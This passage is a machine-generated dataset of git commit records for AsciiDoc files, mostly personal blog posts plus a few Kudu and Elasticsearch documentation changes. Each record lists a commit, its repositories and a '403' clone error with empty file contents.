uyF.github.io,hinaloe\/hubpress,thomaszahr\/thomaszahr.github.io,dsp25no\/blog.dsp25no.ru,wink-\/wink-.github.io,gudhakesa\/gudhakesa.github.io,YJSoft\/yjsoft.github.io,uskithub\/uskithub.github.io,realraindust\/realraindust.github.io,Zatttch\/zatttch.github.io,jbrizio\/jbrizio.github.io,dbect\/dbect.github.io,Nil1\/Nil1.github.io,xumr0x\/xumr0x.github.io,OctavioMaia\/octaviomaia.github.io,ioisup\/ioisup.github.io,emtudo\/emtudo.github.io,vba\/vba.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,fundstuecke\/fundstuecke.github.io,quangpc\/quangpc.github.io,nbourdin\/nbourdin.github.io,ashelle\/ashelle.github.io,AntoineTyrex\/antoinetyrex.github.io,alvarosanchez\/alvarosanchez.github.io,ashelle\/ashelle.github.io,heliomsolivas\/heliomsolivas.github.io,dvbnrg\/dvbnrg.github.io,pointout\/pointout.github.io,kubevirt\/blog,stevenxzhou\/alex1007.github.io,topranks\/topranks.github.io,royston\/hubpress.io,joelcbailey\/joelcbailey.github.io,hermione6\/hermione6.github.io,grzrobak\/grzrobak.github.io,lovian\/lovian.github.io,martinteslastein\/martinteslastein.github.io,susanburgess\/susanburgess.github.io,ennerf\/ennerf.github.io,matthiaselzinga\/matthiaselzinga.github.io,PertuyF\/PertuyF.github.io,ekroon\/ekroon.github.io,enderxyz\/enderxyz.github.io,marchelo2212\/marchelo2212.github.io,murilo140891\/murilo140891.github.io,mkaptein172\/mkaptein172.github.io,fbruch\/fbruch.github.com,christianmtr\/christianmtr.github.io,vvani06\/hubpress-test,Vanilla-Java\/vanilla-java.github.io,fbruch\/fbruch.github.com,Rackcore\/Rackcore.github.io,jelitox\/jelitox.github.io,vanpelt\/vanpelt.github.io,hirako2000\/hirako2000.github.io,srevereault\/srevereault.github.io,olivierbellone\/olivierbellone.github.io,dobin\/dobin.github.io,ecommandeur\/ecommandeur.github.io,blahcadepodcast\/blahcadepodcast.github.io,ekroon\/ekroon.github.io,anwfr\/blog.anw.fr,jivank\/jivank.github.io,deformat\/deformat.github.io,miroque\/shirokuma,HiDAl\/hidal.github.io,izziiyt\/izziiyt.github.io,seatones\/seatones.github.io,nullbase\/nullbase.github.io,romanegunkov\/romanegunkov.github.io,sgalles\/sgalles.github.io,justafool5\/justafool5.github.io,Driven-Development\/Driven-Development.github.io,modmaker\/modmaker.github.io,Oziabr\/Oziabr.github.io,raytong82\/raytong82.github.io,rlebron88\/rlebron88.github.io,LearningTools\/LearningTools.github.io,blackgun\/blackgun.github.io,minicz\/minicz.github.io,kunicmarko20\/kunicmarko20.github.io,bretonio\/bretonio.github.io,KurtStam\/kurtstam.github.io,itsashis4u\/hubpress.io,CBSti\/CBSti.github.io","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0110d28cd97143f467c36fb9cb8f69f3c651d2ab","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e8249d173e58512437ce583186cc74d48fef8e9d","subject":"Update 2011-01-05-Apache-and-Request-Body-Timeout.adoc","message":"Update 2011-01-05-Apache-and-Request-Body-Timeout.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-01-05-Apache-and-Request-Body-Timeout.adoc","new_file":"_posts\/2011-01-05-Apache-and-Request-Body-Timeout.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de43ffe778d47e458037cf7ed950899fdb65ab83","subject":"[docs] guide on assertions in the Java code","message":"[docs] guide on assertions in the Java code\n\nAdded guide on using assert and Guava Preconditions in the Kudu Java\nclient code. That's a compilation of the information from the following\ne-mail thread:\n\n https:\/\/lists.apache.org\/thread.html\/13e39d1c4e632c5fcc134097a045fe89f5a2955ac3838a48e4e38bc2@%3Cdev.kudu.apache.org%3E\n\nAlso, separated the CMake style guide from the C++ code style section.\n\nChange-Id: I78c249021f9eb9a9a94cdf1ff1b2dae94561c2fd\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7549\nTested-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"571289d2286f6e3c8c47a008f2f0b289a12b87fe","subject":"docs: fix two broken links in docs","message":"docs: fix two broken links in docs\n\nChange-Id: I227af7b51d6c64b7a2151665f7a36a3aecb75e34\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1183\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Misty Stanley-Jones 
<b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dab892645b19fdedfa34388bfc7adb01afee2271","subject":"Update 2016-11-23-Project-Darwin.adoc","message":"Update 2016-11-23-Project-Darwin.adoc","repos":"Imran31\/imran31.github.io","old_file":"_posts\/2016-11-23-Project-Darwin.adoc","new_file":"_posts\/2016-11-23-Project-Darwin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Imran31\/imran31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27d36df2c78934f907d00c3691c868d60f53ec28","subject":"Update 2016-11-02-hej.adoc","message":"Update 2016-11-02-hej.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2016-11-02-hej.adoc","new_file":"_posts\/2016-11-02-hej.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"924690134395b8df95a2bb3fa63783686df8dc83","subject":"Add files via upload","message":"Add files via upload\n\nAsciidoc trial","repos":"smru\/Documentation,smru\/Documentation","old_file":"_template.adoc","new_file":"_template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed0be364cda18cb9e5d5cc93f74893b9e6c3fc60","subject":"Update 2017-07-25-Under-the-shades.adoc","message":"Update 2017-07-25-Under-the-shades.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2017-07-25-Under-the-shades.adoc","new_file":"_posts\/2017-07-25-Under-the-shades.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2645345752b2514880b90858abc159229a08f57","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 
2019-01-31-My-English-Title.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5b6b64f8d96b6dd8410970b29b575c7bf8b1b78","subject":"Update 2017-03-23-Update-Whats-New-in-Version-080.adoc","message":"Update 2017-03-23-Update-Whats-New-in-Version-080.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2017-03-23-Update-Whats-New-in-Version-080.adoc","new_file":"_posts\/2017-03-23-Update-Whats-New-in-Version-080.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f951288110e173a46eb2bbb215eb9ad66780b930","subject":"y2b create post The DIY Jacket Upgrade, Thank Me Later","message":"y2b create post The DIY Jacket Upgrade, Thank Me Later","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-07-TheDIYJacketUpgradeThankMeLater.adoc","new_file":"_posts\/2018-01-07-TheDIYJacketUpgradeThankMeLater.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"129bfb310a0784ca9252f1760f84ef4eeccfce4e","subject":"Update 2016-03-02-Rivers-of-Light-to-debut-April-22-in-Disneys-Animal-Kingdom.adoc","message":"Update 2016-03-02-Rivers-of-Light-to-debut-April-22-in-Disneys-Animal-Kingdom.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-02-Rivers-of-Light-to-debut-April-22-in-Disneys-Animal-Kingdom.adoc","new_file":"_posts\/2016-03-02-Rivers-of-Light-to-debut-April-22-in-Disneys-Animal-Kingdom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57157d90628fc0bde7601fd78ae0b1b3adf0563f","subject":"Update 2017-07-30-aspnet-core-with-cookie-authentication-in-web-farm-scenario.adoc","message":"Update 2017-07-30-aspnet-core-with-cookie-authentication-in-web-farm-scenario.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-07-30-aspnet-core-with-cookie-authentication-in-web-farm-scenario.adoc","new_file":"_posts\/2017-07-30-aspnet-core-with-cookie-authentication-in-web-farm-scenario.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efcddb217c1e77879fcc04cf31ebb3b5d27a244e","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 
2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e62a878ee541e30dc26a0b3d5d95b5773a93ce","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fc9f193df45e4421d899ceb635d7eaa91342117","subject":"Moved exporting ogre to own file.","message":"Moved exporting ogre to own file.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/blender\/blender_ogre_export.adoc","new_file":"src\/docs\/asciidoc\/blender\/blender_ogre_export.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"d4782eb18f1572eaf19bdab1a7265c6bba8aecdd","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdba76162db558b11a1962049d3b64b722003b27","subject":"Update 2018-10-31-H-T-M-L.adoc","message":"Update 2018-10-31-H-T-M-L.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90024fbb8ae53c9a4934f01eb30ec13c7da73a28","subject":"Added initial readme for Herbert.","message":"Added initial readme for Herbert.\n","repos":"obfischer\/herbert","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obfischer\/herbert.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"cfccc609206c77fee049c638143947f357bd51de","subject":"y2b create post Turn Any Surface Into A Touch Screen!","message":"y2b create post Turn Any Surface Into A Touch Screen!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-02-Turn-Any-Surface-Into-A-Touch-Screen.adoc","new_file":"_posts\/2016-09-02-Turn-Any-Surface-Into-A-Touch-Screen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdc51ee0f3f2dbb48439bdd11264fafd3881b7d2","subject":"Update 2017-11-13-Log-directly-to-Logstash-from-Payara.adoc","message":"Update 2017-11-13-Log-directly-to-Logstash-from-Payara.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-11-13-Log-directly-to-Logstash-from-Payara.adoc","new_file":"_posts\/2017-11-13-Log-directly-to-Logstash-from-Payara.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b7335f0ccaadf442a64b73193ba3df2aac70c0a","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"294568e8356427d91d139fa1bd6f5c226a53a000","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Null.adoc","new_file":"Best practices\/Null.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ea60f996dd876e9648a24ff8416e2832644d29c","subject":"Update 2015-02-18-Coding-rules.adoc","message":"Update 2015-02-18-Coding-rules.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2015-02-18-Coding-rules.adoc","new_file":"_posts\/2015-02-18-Coding-rules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c25b37f73a08bd0dfc78e96d9442cdb17b58fd4c","subject":"draft final report","message":"draft final report\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-25-final_report.adoc","new_file":"_posts\/2017-08-25-final_report.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3afc0688a48954baa864d6e5ba8a2966625c6d8","subject":"job: #12562 Introduce implementation note for file load fix.","message":"job: #12562 Introduce implementation note for file load fix.\n","repos":"leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,cortlandstarrett\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc","old_file":"doc\/notes\/12562_wasl_sensitive_int.adoc","new_file":"doc\/notes\/12562_wasl_sensitive_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57c752000cfe4f7020ecd98be08a7d7ab015c4f6","subject":"[DOCS] Update shared attributes for Elasticsearch (#25479)","message":"[DOCS] Update shared attributes for Elasticsearch (#25479)\n\n* [DOCS] Update shared attributes for Elasticsearch\r\n\r\n* [DOCS] Moved shared attributes to Versions.asciidoc\r\n\r\n* [DOCS] More more book URLs to shared attributes\r\n","repos":"kalimatas\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,maddin2016\/elasticsearch,HonzaKral\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,naveenhooda2000\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elas
ticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,qwerty4030\/elasticsearch,shreejay\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,mohit\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,jimczi\/elasticsearch","old_file":"docs\/Versions.asciidoc","new_file":"docs\/Versions.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b5d4d1ed7e883674a32953ab20c46b978790210","subject":"y2b create post Samsung Galaxy S III Unboxing \\u0026 Overview (Galaxy S3 Pebble Blue)","message":"y2b create post Samsung Galaxy S III Unboxing \\u0026 Overview (Galaxy S3 Pebble Blue)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-10-08-Samsung-Galaxy-S-III-Unboxing-u0026-Overview-Galaxy-S3-Pebble-Blue.adoc","new_file":"_posts\/2012-10-08-Samsung-Galaxy-S-III-Unboxing-u0026-Overview-Galaxy-S3-Pebble-Blue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ae47fb976da1d1fd19f1c9290c1a3332599affe","subject":"y2b create post It's time to sell your 
